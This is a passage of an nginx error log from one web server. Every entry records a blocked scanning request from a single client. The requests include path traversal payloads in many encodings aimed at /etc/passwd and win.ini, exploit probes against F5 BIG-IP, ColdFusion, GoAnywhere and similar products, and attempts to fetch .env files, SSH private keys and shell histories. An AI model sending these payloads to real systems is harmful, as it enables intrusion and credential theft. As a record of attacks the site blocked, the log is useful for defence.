[error] 3404146#3404146: *171423 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:55 [error] 3404146#3404146: *171425 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:57 [error] 3404146#3404146: *171437 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 13:07:59 [error] 3404146#3404146: *171461 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:00 [error] 3404146#3404146: *196517 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:11 [error] 3404146#3404146: *196572 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:18 [error] 3404146#3404146: *196594 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:30 [error] 3404146#3404146: *196650 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:35 [error] 3404146#3404146: *196679 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:39 [error] 3404146#3404146: *196698 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/03/08 18:07:42 [error] 3404146#3404146: *196718 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:07:59 [error] 3404146#3404146: *196810 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:01 [error] 3404146#3404146: *196824 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:02 [error] 3404146#3404146: *196828 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:05 [error] 3404146#3404146: *196844 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:06 [error] 3404146#3404146: *196850 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:09 [error] 3404146#3404146: *196868 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:12 [error] 3404146#3404146: *196885 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:08:14 [error] 3404146#3404146: *196894 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:10:30 [error] 3404146#3404146: *197049 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:12:09 [error] 3404146#3404146: *197166 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:13:13 [error] 3404146#3404146: *197232 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:14:41 [error] 3404146#3404146: *197347 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:14:51 [error] 3404146#3404146: *197356 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:15:55 [error] 3404146#3404146: *197432 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/03/08 18:16:14 [error] 3404146#3404146: *197475 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:17:50 [error] 3404146#3404146: *197580 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:18:02 [error] 3404146#3404146: *197593 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:18:47 [error] 3404146#3404146: *197640 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:18:59 [error] 3404146#3404146: *197657 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:19:20 [error] 3404146#3404146: *197692 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:19:25 [error] 3404146#3404146: *197698 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:19:44 [error] 3404146#3404146: *197717 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:20:05 [error] 3404146#3404146: *197741 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:35:09 [error] 3404146#3404146: *198601 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:35:30 [error] 3404146#3404146: *198634 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.axiom/accounts/do.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:40:53 [error] 3404146#3404146: *199059 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:41:18 [error] 3404146#3404146: *199087 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:19 [error] 3404146#3404146: *199213 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:19 [error] 3404146#3404146: *199214 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:19 [error] 3404146#3404146: *199216 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:19 [error] 3404146#3404146: *199217 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:19 [error] 3404146#3404146: *199218 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:20 [error] 3404146#3404146: *199219 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:21 [error] 3404146#3404146: *199233 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:43:36 [error] 3404146#3404146: *199244 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:45:14 [error] 3404146#3404146: *199371 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:46:27 [error] 3404146#3404146: *199461 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:46:38 [error] 3404146#3404146: *199473 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:46:43 [error] 3404146#3404146: *199479 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /artemis/1/..;/env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:46:59 [error] 3404146#3404146: *199500 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/03/08 18:47:09 [error] 3404146#3404146: *199511 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/03/08 18:49:35 [error] 3404146#3404146: *199667 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:35 [error] 3404146#3404146: *199668 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:36 [error] 3404146#3404146: *199669 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:36 [error] 3404146#3404146: *199670 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:36 [error] 3404146#3404146: *199671 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:36 [error] 3404146#3404146: *199672 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:36 [error] 3404146#3404146: *199673 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:37 [error] 3404146#3404146: *199674 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:37 [error] 3404146#3404146: *199675 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:37 [error] 3404146#3404146: *199676 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:37 [error] 3404146#3404146: *199677 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:49:37 [error] 3404146#3404146: *199678 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:50:47 [error] 3404146#3404146: *199755 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:52:34 [error] 3404146#3404146: *199870 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:54:06 [error] 3404146#3404146: *199997 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:54:54 [error] 3404146#3404146: *200050 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:04 [error] 3404146#3404146: *200254 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:10 [error] 3404146#3404146: *200261 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:12 [error] 3404146#3404146: *200262 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:12 [error] 3404146#3404146: *200264 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200265 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200268 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200269 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200270 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200271 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200272 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200273 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:13 [error] 3404146#3404146: *200274 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200275 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200276 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200277 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200278 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200279 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200280 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200281 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200282 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200283 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:15 [error] 3404146#3404146: *200284 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:32 [error] 3404146#3404146: *200309 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200310 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200311 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200312 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200313 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200314 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 18:58:33 [error] 3404146#3404146: *200315 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:11 [error] 3404146#3404146: *200429 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:11 [error] 3404146#3404146: *200430 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:11 [error] 3404146#3404146: *200432 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:11 [error] 3404146#3404146: *200435 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:11 [error] 3404146#3404146: *200436 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200437 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200438 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200439 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200440 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200441 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200442 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200443 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200444 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200445 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:12 [error] 3404146#3404146: *200446 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200447 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200448 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200449 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200450 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200451 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200452 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:00:13 [error] 3404146#3404146: *200453 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:10 [error] 3404146#3404146: *200492 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:10 [error] 3404146#3404146: *200494 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:10 [error] 3404146#3404146: *200495 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200496 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200497 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200498 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200499 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200500 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200501 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200502 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200503 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200504 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET 